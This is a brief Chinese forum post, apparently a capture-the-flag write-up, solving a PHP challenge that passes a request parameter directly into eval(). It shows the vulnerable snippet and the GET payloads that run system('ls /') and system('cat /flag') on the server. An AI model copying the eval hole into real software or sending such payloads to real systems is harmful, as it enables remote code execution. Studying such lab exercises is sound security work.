虾虾一米六 发表于 2023-3-17 22:49:56

eval--WP

# eval

打开题目

```php
<?php
highlight_file(__FILE__);
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
}
?>
```

直接使用get请求

![](./data/attachment/forum/202303/17/224947vvlc1fccv08005l5.png)

/?cmd=system('ls /');

发现flag

查看flag

![](./data/attachment/forum/202303/17/224953jj93wro339zjy3r2.png)

/?cmd=system('cat /flag');


            
页: [1]
查看完整版本: eval--WP